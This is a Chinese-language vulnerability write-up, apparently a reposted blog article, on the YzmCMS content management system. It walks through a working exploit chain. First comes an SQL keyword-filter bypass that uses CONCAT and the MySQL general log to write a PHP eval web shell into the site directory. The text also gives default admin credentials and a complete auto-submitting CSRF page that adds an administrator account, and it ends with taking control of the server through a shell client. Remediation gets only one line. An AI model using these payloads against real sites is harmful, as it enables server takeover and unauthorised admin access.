0x00 环境准备
YzmCMS官网:http://www.yzmcms.com/
程序源码下载:http://pan.baidu.com/s/1pKA4u99
测试网站首页:
0x01 代码分析1、文件位置: /application/admin/controller/sql.class.php第10-42行中:
- public function init() {
- if(isset($_POST['sqlstr'])){
- if(!C('sql_execute')) showmsg('根据系统配置,不允许在线执行SQL命令!', 'stop');
- $sqlstr = MAGIC_QUOTES_GPC ? stripslashes($_POST['sqlstr']) : $_POST['sqlstr'];
- $sqlstr = rtrim(trim($sqlstr), ';');
- $sqls = $_POST['action']=='many' ? explode(';', $sqlstr) : array(0 => $sqlstr);
- $admin = D('admin');
- foreach($sqls as $sql){
- 10. if(stristr($sql, 'outfile')){
- 11. $str = '<span class="c-red">ERROR : 检测到非法字符 “outfile”!</span>';
- 12. break;
- 13. }
- 14. if(stristr($sql, '.php')){
- 15. $str = '<span class="c-red">ERROR : 检测到非法字符 “.php” !</span>';
- 16. break;
- 17. }
- 18. if(preg_match("/^drop(.*)database/i", $sql)){
- 19. $str = '<span class="c-red">ERROR : 不允许删除数据库!</span>';
- 20. break;
- 21. }
- 22. $result = $admin->query($sql);
- 23. if($result){
- 24. $str = '<span style="color:green">OK : 执行成功!</span>';
- 25. if(is_object($result) || is_resource($result)){
- 26. $arr = $admin->fetch_all($result);
- 27. }
- 28. }else{
- 29. $str = '<span class="c-red">ERROR : 执行失败!</span>';
- 30. break;
- 31. }
- 32. }
- 33. }
这段函数中对提交的sql参数进行还原处理,然后进行非法字符检测,检测字符是否存在”oufile”、”.php”,匹配是否有删除数据的 *** 作等。
2、如何绕过这种限制?
首页,outfile被禁止,第一时间想到的就是SQL语句利用日志写入文件,但是写入脚本文件”.php”会被检测到非法字符;然后,尝试MySQL中concat函数来连接字符串,拆分’.php’关键词,如 CONCAT("test.","php");最后构造出可以写入文件,绕过非法字符检测的的SQL语句,从而触发代码执行漏洞,控制服务器。
Payload:
- show variables like '%general%'; #查看配置
- set global general_log = on; #开启general log模式
- set global general_log_file =CONCAT("E:\study\WWW\YzmCMS\test.","php");
- select '<?php eval($_POST[cmd]);?>'; #写入shell
有两种思路:
思路A:通过默认信息,弱口令登录
默认后台路径:http://127.0.0.1/admin/index/login.html
管理员默认账号密码均为:yzmcms
思路B:通过CSRF漏洞,诱导管理员访问,自动在后台添加管理员账号。
CSRF漏洞利用代码如下:
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
- <html>
- <head>
- <title>OWASP CRSFTester Demonstration</title>
- </head>
- <body onload="javascript:fireForms()">
- <script language="JavaScript">
- var pauses = new Array( "68" );
- 10.
11. function pausecomp(millis)
12. {
- 13. var date = new Date();
- 14. var curDate = null;
- 15.
- 16. do { curDate = new Date(); }
- 17. while(curDate-date < millis);
18. }
- 19.
20. function fireForms()
21. {
- 22. var count = 1;
- 23. var i=0;
- 24.
- 25. for(i=0; i<count; i++)
- 26. {
- 27. document.forms[i].submit();
- 28.
- 29. pausecomp(pauses[i]);
- 30. }
31. }
- 32.
33. </script>
34. <H2>OWASP CRSFTester Demonstration</H2>
35. <form method="POST" name="form0" action="http://127.0.0.1:80/admin/admin_manage/add.html">
36. <input type="hidden" name="adminname" value="admin"/>
37. <input type="hidden" name="password" value="abc123!"/>
38. <input type="hidden" name="password2" value="abc123!"/>
39. <input type="hidden" name="email" value=""/>
40. <input type="hidden" name="realname" value=""/>
41. <input type="hidden" name="roleid" value="1"/>
42. <input type="hidden" name="dosubmit" value="1"/>
43. </form>
44. </body>
45. </html>
B、代码执行漏洞利用Payload:
- show variables like '%general%'; #查看配置
- set global general_log = on; #开启general log模式
- set global general_log_file =CONCAT("E:\study\WWW\YzmCMS\test.","php");
- select '<?php eval($_POST[cmd]);?>'; #写入shell
1、 执行sql语句,查看mysql日志配置情况
2、 根据日志文件位置或者默认站点路径来推测站点目录,可用load_file()函数来测试,确认站点目录位置。
或者通过phpinfo()等信息收集获取站点目录。
3、 分别执行下列sql语句,将脚本代码写入文件:
set global general_log = on;
set global general_log_file =CONCAT("E:\\study\\WWW\\YzmCMS\\test.","php"); select '<?php eval($_POST[cmd]);?>';
4、 提交参数,执行脚本代码:
5、 通过菜刀连接,获取服务器控制权限:
0x03 修复建议1、Mysql数据库降权处理,让入侵者无法做高权限下可做的事!
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)